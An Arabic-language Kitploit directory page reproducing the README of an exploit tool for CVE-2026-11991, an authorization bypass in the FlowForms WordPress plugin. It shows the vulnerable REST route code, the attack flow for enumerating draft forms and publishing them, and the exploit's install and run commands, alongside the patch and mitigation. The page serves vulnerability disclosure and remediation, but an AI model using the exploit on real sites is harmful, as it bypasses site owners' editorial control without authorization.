Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-11991-Exploit — استغلال آلي لثغرة CVE-2026-11991، وهي تجاوز للتفويض في إضافة FlowForms الخاصة بووردبريس تتيح لمستخدمي Contributor+ نشر أي نموذج مسودة عبر طلبات REST API مصممة بعناية. | Kitploit
أدوات/GitHubGitHub/0x00phantom-hat/cve-2026-11991-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHub0x00phantom-hat/cve-2026-11991-exploit

CVE-2026-11991-Exploit

استغلال آلي لثغرة CVE-2026-11991، وهي تجاوز للتفويض في إضافة FlowForms الخاصة بووردبريس تتيح لمستخدمي Contributor+ نشر أي نموذج مسودة عبر طلبات REST API مصممة بعناية.

عرض المستودع
منذ 13س 20دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-11991 — نشر النماذج غير المصرح به في FlowForms

تجاوز التفويض (مساهم+) لنشر أي نموذج مسودة في FlowForms ≤ 1.1.1

نظرة عامة على الثغرة

الخاصيةالقيمة
معرف CVECVE-2026-11991
درجة CVSS6.2 — متوسطة
متجه CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:H/RL:O/RC:C
CWECWE-639 (تجاوز التفويض عبر مفتاح يتحكم به المستخدم)
المنتجFlowForms — إضافة منشئ النماذج التفاعلية لووردبريس
المتأثرجميع الإصدارات حتى 1.1.1
تم الإصلاح في1.1.2
الباحثPhantom Hat

التحليل الفني

دراسة حالة كاملة بالصندوق الأبيض مع تحليل الكود المصدري، وتتبع تدفق المدخلات، ومقارنة التصحيحات:

📄 دراسة حالة CVE-2026-11991 — Medium

سطح الهجوم

يكشف FlowForms عن واجهة REST API تحت مساحة الاسم flowforms/v1. نقطة النشر:

root@kitploit:~
POST /index.php?rest_route=/flowforms/v1/forms/{id}/publish

تقبل {id} الذي يتحكم به المستخدم في مسار URL وترفع نموذج المسودة إلى الموقع المباشر.

السبب الجذري

يقوم permission_callback لمسار /publish فقط بفحص قدرة عامة:

root@kitploit:~
register_rest_route($ns, '/forms/(?P<id>\d+)/publish', [
    'methods'             => 'POST',
    'callback'            => [$this, 'publish_form'],
    'permission_callback' => fn() => current_user_can('edit_posts'),
]);

edit_posts هي قدرة يمتلكها المساهمون — وهو دور يقيده ووردبريس عمدًا من نشر المحتوى. لا يوجد أي تحقق من الملكية مقابل form_id المستهدف. يمكن لأي مستخدم مصادق نشر أي نموذج مسودة على الموقع.

تدفق الهجوم

root@kitploit:~
المهاجم (مساهم)              FlowForms REST API
        │                                   │
        │── POST /wp-login.php ────────────>│  (1) المصادقة كمساهم
        │<─ wordpress_logged_in cookie ─────│
        │                                   │
        │── GET /wp-admin/post-new.php ────>│  (2) جمع REST nonce
        │<─ wpApiSettings.nonce ────────────│
        │                                   │
        │── GET /flowform/{id} ────────────>│  (3) تعداد النماذج المسودة
        │<─ "Form Not Published" ───────────│      (استجابة غير مصادقة)
        │                                   │
        │── POST /flowforms/v1/forms/       │  (4) تشغيل النشر على
        │        {id}/publish ─────────────>│      أي معرف نموذج مسودة
        │                                   │      ← لا يوجد فحص ملكية
        │<─ { "success": true } ────────────│
        │                                   │
        │   النموذج أصبح الآن مباشرًا على الموقع │  (5) المسودة تتجاوز
        │   دون موافقة تحريرية               │      سير العمل التحريري

استخدام الاستغلال

المتطلبات الأساسية

  • Python 3.8+
  • حساب مصادق بدور مساهم على الأقل على الموقع المستهدف

التثبيت

root@kitploit:~
git clone https://github.com/0x00phantom-hat/CVE-2026-11991-FlowForms-Exploit
cd CVE-2026-11991-FlowForms-Exploit
pip install -r requirements.txt

الاستخدام الأساسي

root@kitploit:~
python3 CVE-2026-11991-exploit.py \
  --url http://TARGET \
  --user contributor \
  --password password123 \
  --num_forms 100 \
  --id_start 1

مع بروكسي (Burp Suite)

root@kitploit:~
python3 CVE-2026-11991-exploit.py \
  --url http://TARGET \
  --proxy http://127.0.0.1:8080 \
  --user contributor \
  --password password123 \
  --num_forms 100 \
  --id_start 1

مرجع كامل للخيارات

الخيارالوصفمطلوب
--urlعنوان URL المستهدف لووردبريس✅
--userاسم مستخدم ووردبريس (مساهم+)✅
--passwordكلمة مرور ووردبريس✅
--num_formsعدد معرفات النماذج للتعداد✅
--id_startمعرف البداية لتعداد النماذج✅
--proxyعنوان البروكسي (مثل http://127.0.0.1:8080)❌

سير عمل الاستغلال

ينفذ الاستغلال ثلاث خطوات آلية:

الخطوة 1 — المصادقة تسجيل الدخول كمهاجم (مساهم) وجمع nonce صالح لواجهة REST API من wp-admin.

الخطوة 2 — تعداد المسودات فحص GET /flowform/{id} عبر نطاق المعرفات المحدد. يتم جمع النماذج التي تُرجع "Form Not Published" كأهداف — وهي نماذج مسودة لا يملكها المهاجم.

الخطوة 3 — النشر إرسال POST /flowforms/v1/forms/{id}/publish مع nonce المهاجم. تقبل نقطة النهاية الطلب، وترفع المسودة، وتجعل النموذج مباشرًا — دون أي فحص تفويض على الملكية.


المعالجة

الإجراءالتفاصيل
التصحيحاستبدال فحص edit_posts العام بـ current_user_can('edit_post', $form_id) — الوسيطة الثانية تربط فحص القدرة بكائن المنشور المحدد، مما يفرض قواعد ملكية ووردبريس
التخفيفحتى يتم التصحيح، قيّد أدوار المساهم والمؤلف إذا كانت الإضافة نشطة

التنفيذ الآمن

root@kitploit:~
// ضعيف
'permission_callback' => fn() => current_user_can('edit_posts'),

// آمن (مصحح)
private function can_edit_form($form_id) {
    return current_user_can('edit_post', $form_id);
}
'permission_callback' => fn($request) => $this->can_edit_form(absint($request['id'])),

المراجع

  • CWE-639 — تجاوز التفويض عبر مفتاح يتحكم به المستخدم
  • register_rest_route() — توثيق مطوري ووردبريس
  • current_user_can() — توثيق مطوري ووردبريس
  • إضافة FlowForms — WordPress.org

هيكل المشروع

root@kitploit:~
CVE-2026-11991-FlowForms-Exploit/
├── CVE-2026-11991-exploit.py   # استغلال محسّن بواجهة غنية
├── requirements.txt            # تبعيات Python
└── README.md                   # هذا الملف

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض اختبار الأمان المصرح به والبحث التعليمي فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب القوانين المعمول بها في جميع أنحاء العالم. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذا البرنامج. احصل دائمًا على إذن كتابي صريح قبل اختبار أي نظام لا تملكه.


المؤلف

Phantom Hat — باحث أمني مستقل

  • Medium: @phantom_hat
  • GitHub: 0x00phantom-hat

أُجري هذا البحث كجزء من الإفصاح المسؤول عن الثغرات.

تنزيل الأداة